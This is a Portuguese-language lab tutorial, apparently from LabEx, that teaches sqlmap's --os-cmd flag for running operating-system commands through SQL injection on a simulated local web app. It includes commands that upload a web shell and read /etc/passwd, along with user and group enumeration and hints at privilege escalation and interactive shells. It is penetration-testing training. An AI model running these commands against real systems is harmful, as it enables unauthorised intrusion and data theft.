LabEx
EntrarJunte-se

Executar Comandos do Sistema Operacional com sqlmap

Kali LinuxBeginner
Pratique Agora

Introdução

Neste laboratório, você explorará a poderosa capacidade do sqlmap de executar comandos do sistema operacional em um servidor alvo. Este recurso é particularmente útil em cenários de testes de penetração onde você identificou uma vulnerabilidade de injeção de SQL e deseja comprometer ainda mais o sistema subjacente. Você aprenderá a usar o flag --os-cmd, analisar a saída e entender as limitações desta técnica.

Confirmar Pré-requisitos para Execução de Comandos do SO

Nesta etapa, você garantirá que o sqlmap está instalado e que você tem um entendimento básico de como identificar uma vulnerabilidade de injeção de SQL. A execução de comandos do SO através do sqlmap geralmente depende da capacidade de escrever arquivos no sistema alvo (por exemplo, um web shell) ou de alavancar funções específicas do banco de dados que permitem a execução de comandos.

Primeiro, verifique se o sqlmap está instalado em seu sistema. Abra um terminal e digite:

sqlmap --version

Você deverá ver uma saída semelhante a esta, indicando a versão do sqlmap instalada:

sqlmap version 1.x.x.x ## Substitua x.x.x.x pela versão real

Em seguida, usaremos o sqlmap para detectar uma vulnerabilidade de injeção de SQL em uma aplicação web local simulada. Esta aplicação está configurada para ser vulnerável à injeção de SQL.

sqlmap -u "http://127.0.0.1:8000/index.php?id=1" --batch --risk=3 --level=3

O flag --batch instrui o sqlmap a rodar em modo não interativo, aceitando as escolhas padrão. --risk=3 e --level=3 aumentam a profundidade dos testes que o sqlmap realiza, o que é frequentemente necessário para encontrar vulnerabilidades mais complexas, incluindo aquelas que podem permitir a execução de comandos do SO.

Após executar o comando, o sqlmap realizará vários testes. Procure por saídas que indiquem que uma vulnerabilidade de injeção de SQL foi detectada. Você pode ver linhas semelhantes a:

---
[INFO] testando a conexão com a URL alvo
[INFO] verificando se o alvo está estável
[INFO] URL alvo está estável
[INFO] testando se o parâmetro GET 'id' é vulnerável à injeção de SQL
...
[INFO] parâmetro GET 'id' é vulnerável.
...
---

Isso confirma que o sqlmap identificou com sucesso uma vulnerabilidade de injeção de SQL, que é um pré-requisito para tentar a execução de comandos do SO.

Usar o Flag --os-cmd para um Único Comando

Nesta etapa, você aprenderá a usar o flag --os-cmd no sqlmap para executar um único comando do sistema operacional no servidor alvo. Este flag é usado quando o sqlmap identificou uma maneira de executar comandos, tipicamente através do upload de um web shell ou alavancando funções específicas do banco de dados.

A sintaxe básica para usar --os-cmd é:

sqlmap -u "http://127.0.0.1:8000/index.php?id=1" --os-cmd="<comando>" --batch

Substitua <comando> pelo comando do SO real que você deseja executar. O sqlmap tentará executar este comando e retornar sua saída.

Vamos tentar executar um comando simples como ls para listar os arquivos no diretório atual onde a aplicação web está rodando.

sqlmap -u "http://127.0.0.1:8000/index.php?id=1" --os-cmd="ls" --batch

O sqlmap então procederá para:

  1. Detectar a vulnerabilidade de injeção de SQL.
  2. Tentar encontrar uma técnica adequada para execução de comandos do SO (por exemplo, fazendo upload de um web shell).
  3. Executar o comando ls.
  4. Recuperar e exibir a saída do comando.

Você verá várias mensagens do sqlmap indicando seu progresso, como:

...
[INFO] tentando fazer upload de um web shell para execução de comandos do SO
[INFO] web shell enviado para '/tmp/web_app/tmpbxxxx.php'
[INFO] executando comando do SO 'ls'
...

A saída do comando ls será exibida pelo sqlmap após sua execução bem-sucedida. Isso demonstra a capacidade de executar comandos arbitrários no servidor.

Executar um Comando Simples como whoami ou id

Nesta etapa, você executará comandos comuns do Linux como whoami e id para coletar informações sobre o contexto de usuário e grupo sob o qual o processo do servidor web está rodando. Esta informação é crucial para entender os privilégios que você tem no sistema comprometido.

Primeiro, vamos executar o comando whoami:

sqlmap -u "http://127.0.0.1:8000/index.php?id=1" --os-cmd="whoami" --batch

Após o sqlmap terminar, ele exibirá a saída do comando whoami. Isso será tipicamente o nome de usuário sob o qual o servidor web (por exemplo, www-data, apache, ou labex em nosso ambiente de laboratório) está rodando.

...
[INFO] saída do comando do SO recuperada:
labex
...

Em seguida, execute o comando id. Este comando fornece informações mais detalhadas, incluindo o ID do usuário (UID), ID do grupo (GID) e todos os grupos aos quais o usuário pertence.

sqlmap -u "http://127.0.0.1:8000/index.php?id=1" --os-cmd="id" --batch

A saída do comando id se parecerá com algo assim:

...
[INFO] saída do comando do SO recuperada:
uid=1000(labex) gid=1000(labex) groups=1000(labex),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
...

Analisar esta saída ajuda você a entender as permissões disponíveis para você. Por exemplo, se o usuário faz parte do grupo sudo, pode ser possível escalar privilégios.

Analisar a Saída do Comando Retornada pelo sqlmap

Nesta etapa, você se concentrará em entender como o sqlmap apresenta a saída dos comandos do SO executados e o que procurar. O sqlmap recupera a saída do comando do web shell que ele envia (ou outros métodos de execução) e a exibe em seu console.

Ao executar um comando usando --os-cmd, o sqlmap geralmente mostrará uma linha semelhante a:

[INFO] saída do comando do SO recuperada:

Seguida pela saída real do comando. Por exemplo, se você executou ls -l /tmp, a saída pode parecer com:

[INFO] saída do comando do SO recuperada:
total 8
-rw-r--r-- 1 labex labex 1234 Jan 1 10:00 somefile.txt
drwxr-xr-x 2 labex labex 4096 Jan 1 10:05 somedir

É importante ler cuidadosamente esta saída. Ela fornece insights diretos sobre o sistema alvo. Por exemplo:

  • Listagens de arquivos (ls, dir): Revelam estruturas de diretórios, nomes de arquivos e permissões.
  • Informações do sistema (uname -a, cat /etc/os-release): Fornecem detalhes sobre o sistema operacional, versão do kernel e distribuição.
  • Configuração de rede (ip a, ifconfig): Mostram interfaces de rede, endereços IP e configurações de rede.
  • Listas de processos (ps aux): Listam processos em execução, o que pode indicar outros serviços ou aplicações.

Considere executar cat /etc/passwd para ver se você consegue recuperar arquivos sensíveis do sistema.

sqlmap -u "http://127.0.0.1:8000/index.php?id=1" --os-cmd="cat /etc/passwd" --batch

Você verá o conteúdo do arquivo /etc/passwd na saída do sqlmap. Este arquivo contém informações de contas de usuário e é um alvo comum para reconhecimento.

...
[INFO] saída do comando do SO recuperada:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
labex:x:1000:1000:LabEx User,,,:/home/labex:/bin/zsh
...

Analisar esta saída ajuda você a identificar usuários potenciais, seus diretórios home e shells padrão, o que pode ser útil para exploração adicional.

Compreender as Limitações da Execução de Comandos Não Interativa

Nesta etapa, você entenderá as limitações inerentes à execução de comandos do SO através do flag --os-cmd do sqlmap, particularmente sua natureza não interativa.

O flag --os-cmd executa um único comando e retorna sua saída. Ele não fornece um shell interativo (como uma sessão típica de SSH ou terminal). Isso significa:

  1. Sem sessão persistente: Cada execução de --os-cmd é uma solicitação nova e independente. Você não pode executar um comando e, em seguida, usar sua saída para informar o próximo comando na mesma "sessão".
  2. Sem programas interativos: Você não pode executar programas que exigem entrada do usuário ou interação contínua (por exemplo, nano, vi, top, passwd).
  3. Operações complexas limitadas: Encadear comandos com pipes (|) ou ponto e vírgulas (;) é possível, mas gerenciar fluxos de trabalho complexos ou lógica condicional torna-se complicado. Por exemplo, ls -l /tmp | grep "file" funcionaria, mas um script de várias etapas que requer interação do usuário não funcionaria.
  4. Tratamento de erros: Erros são tipicamente retornados como parte da saída do comando, mas depurar problemas complexos pode ser desafiador sem um shell interativo.

Para superar essas limitações, os penetration testers frequentemente usam --os-shell ou --os-pwn no sqlmap (se suportado pelo banco de dados subjacente e pela configuração do servidor web). Esses flags tentam estabelecer um shell semi-interativo ou totalmente interativo, permitindo operações mais complexas. No entanto, --os-cmd é útil para reconhecimento rápido ou para executar comandos únicos e atômicos.

Por exemplo, tente executar um comando que normalmente exigiria interação, como nano.

sqlmap -u "http://127.0.0.1:8000/index.php?id=1" --os-cmd="nano" --batch

Você provavelmente verá um erro ou nenhuma saída significativa, pois o nano espera um terminal e entrada do usuário, o que o sqlmap não pode fornecer neste modo não interativo.

...
[INFO] saída do comando do SO recuperada:
Error opening terminal: unknown.
...

Isso demonstra que, embora poderoso para comandos únicos, --os-cmd não é um substituto para um shell interativo completo.

Resumo

Neste laboratório, você aprendeu com sucesso como executar comandos do sistema operacional em um servidor alvo usando o flag --os-cmd do sqlmap. Você começou confirmando os pré-requisitos, depois praticou a execução de comandos simples como ls, whoami, id e cat /etc/passwd. Você também obteve uma compreensão de como analisar a saída do comando retornada pelo sqlmap e, importantemente, reconheceu as limitações da execução de comandos não interativa. Esta habilidade é fundamental para as fases de pós-exploração em testes de penetração de aplicações web.

Relacionados Kali Linux Cursos
Kali Linux para Iniciantes

Kali Linux para Iniciantes

cybersecuritykalilinux
Exploração de Servidores Kali em Ação

Exploração de Servidores Kali em Ação

cybersecuritykalilinux